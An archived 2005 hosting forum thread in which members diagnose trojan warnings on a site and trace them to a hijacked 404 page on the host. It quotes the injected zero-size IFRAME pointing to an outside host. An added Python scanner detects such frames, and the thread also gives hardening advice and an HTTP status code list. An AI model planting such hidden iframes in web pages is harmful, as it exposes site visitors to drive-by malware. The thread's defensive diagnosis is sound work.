Virus warning when members visit my site


BWD
4-17-05, 11:14 AM
My members are reporting a trojan virus warning when they visit my site. This all began concurrently with the MySQL database problems a day or two ago (I don't know how or if the two are related). But anyway, can anyone help me figure out what is happening and what I need to do to stop it?

My site is....

http://bonanzaworld.net

my forums are....

http://bonanzaworld.net/forums

Thanks for any help....a virus on my site is not something I've encountered before nor know what to do about.

toastmaster
4-17-05, 11:37 AM
> My members are reporting a trojan virus warning when they visit my site. This all began concurrently with the MySQL database problems a day or two ago (I don't know how or if the two are related). But anyway, can anyone help me figure out what is happening and what I need to do to stop it?

Who/what are globolook and tgp.la?

Looking at your source, I see: <IFRAME SRC="http://www.tgp.la/or.html" WIDTH=0 HEIGHT=0 marginheight=0 marginwidth=0 scrolling=no></IFRAME> which looks decidedly dodgy.

BWD
4-17-05, 11:45 AM
oh crap, I know I didn't have that there....I must have been hacked! :(

toastmaster
4-17-05, 11:54 AM
> oh crap, I know I didn't have that there....I must have been hacked! :(

You're using an outrageously old version of vBulletin. Also, your passwords should be 8 letters, totally random, and different for each service (board login, mail, FTP, ops etc). Use something like Password Safe to keep track of them all.

boywaja
4-17-05, 12:01 PM
The question in my mind is whether that is actually in your code or if you have a bad link.

I would recommend checking your code first for tgp.la; if it's not there, then add a custom 404 using .htaccess and see if the problem still exists.

In my opinion the 404 error page for the site we are on has been hacked. It hijacks some 404 error page requests but not all and attempts to load this virus. So if you have one bad internal link, one image that doesn't load, you would then have this problem.

Hope that helps
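
The hidden IFRAME toastmaster spotted is the kind of thing boywaja's "check your code for tgp.la" step is meant to catch. As an added example (not code from the thread), here is a small scanner that flags iframes which are zero-sized, CSS-hidden, or loaded from a host outside the site's own domain; the sample HTML and the injected hostname are constructed placeholders, and the site host is assumed to be bonanzaworld.net.

```python
"""Flag IFRAME injections of the kind spotted in this thread (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class HiddenIframeScanner(HTMLParser):
    """Collects <iframe> tags that look like drive-by injections."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":          # HTMLParser already lowercases tag names
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        # A 0x0 (or 1x1) frame renders nothing but still loads the remote page.
        if a.get("width", "").strip() in ("0", "1") or a.get("height", "").strip() in ("0", "1"):
            reasons.append("zero-size")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("css-hidden")
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        # Relative sources have no host; a foreign host is suspicious on its own.
        if host and not (host == self.site_host or host.endswith("." + self.site_host)):
            reasons.append("external-src")
        if reasons:
            self.findings.append({"src": src, "reasons": reasons})


def find_hidden_iframes(html, site_host):
    """Return a list of {"src", "reasons"} dicts for suspicious iframes in html."""
    scanner = HiddenIframeScanner(site_host)
    scanner.feed(html)
    return scanner.findings


# Constructed sample page: one legitimate same-site frame and one injected 0x0 frame.
# The injected hostname is a placeholder, not a real indicator.
SAMPLE_HTML = """<html><body>
<iframe src="/forums/stats.html" width="300" height="200"></iframe>
<IFRAME SRC="http://injected.example.invalid/or.html" WIDTH=0 HEIGHT=0 marginheight=0 marginwidth=0 scrolling=no></IFRAME>
</body></html>"""

if __name__ == "__main__":
    for finding in find_hidden_iframes(SAMPLE_HTML, "bonanzaworld.net"):
        print(finding["src"], ",".join(finding["reasons"]))
```

Run it over the saved HTML of each page (including the error pages the host serves for a missing image or broken link) rather than only the index, since the thread's injection rode in on a 404 response.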

BWD
4-17-05, 12:47 PM
hmm, I have an outdated link to powweb on my site (from when there used to be a program for sending clients to powweb, before the affiliate program). I never bothered removing the link but I'm wondering if that has something to do with it.

BWD
4-17-05, 03:52 PM
I think to be on the safe side on this I'm going to create custom error pages for my site and use .htaccess to direct usage to them and not PowWeb's....I just need to remember what they all are...there's the...

403
404
505

Any other common ones?

esc
4-17-05, 04:01 PM
Here's a quick list I found:

100 Continue
101 Switching Protocols
200 OK
201 Created
202 Accepted
203 Non-Authoritative Information
204 No Content
205 Reset Content
206 Partial Content
300 Multiple Choices
301 Moved Permanently
302 Moved Temporarily
303 See Other
304 Not Modified
305 Use Proxy
400 Bad Request
401 Unauthorized
402 Payment Required
403 Forbidden
404 Not Found
405 Method Not Allowed
406 Not Acceptable
407 Proxy Authentication Required
408 Request Time-Out
409 Conflict
410 Gone
411 Length Required
412 Precondition Failed
413 Request Entity Too Large
414 Request-URL Too Large
415 Unsupported Media Type
500 Server Error
501 Not Implemented
502 Bad Gateway
503 Out of Resources
504 Gateway Time-Out
505 HTTP Version not supported

boywaja
4-17-05, 04:22 PM
I'm thinking 403, 404 and 500.

200 means ok, it would be kind of funny if the webserver let you return a custom 200 error page instead of the real content.

stevel
4-17-05, 08:38 PM
403, 404 and 500 are the only ones you should typically consider having an error page for. You may want 401 as well, depending on your site.

BWD
4-18-05, 11:36 PM
Just to support the theory we've put together in this thread about hacked PowWeb 404 error pages leading to a trojan horse virus, read this person's security blog....the entry under April 15 (Hijacked 404)....

http://www.infosecblog.org/

Btw, I have now created my own 403, 404 and 500 error pages.

(P.S. what alarms me is this person said he put in a support ticket to PowWeb alerting them of the problem on April 15 (same day as my troubles began), but why hasn't PowWeb addressed this? It sure would have helped me if I'd known about this sooner, since it was April 17 before folks in this forum helped me solve the mystery.)

mikem
4-19-05, 12:18 AM
> (P.S. what alarms me is this person said he put in a support ticket to PowWeb alerting them of the problem on April 15 (same day as my troubles began), but why hasn't PowWeb addressed this? It sure would have helped me if I'd known about this sooner, since it was April 17 before folks in this forum helped me solve the mystery.)

Patience is a virtue ;)


EDIT: ooooh...my 333rd post :)

toastmaster
4-19-05, 04:47 AM
> Patience is a virtue ;)

As this is the third time that PowWeb's 404 page has been hacked / exploited / call it what you will, and in this case appears to be attempting to install malware on visitors' PCs, can you not see the urgency? It bothers me, and it bothers me more that it doesn't bother some people!

stevel
4-19-05, 02:18 PM
My understanding is that the problem has been addressed, but I don't know anything more than that.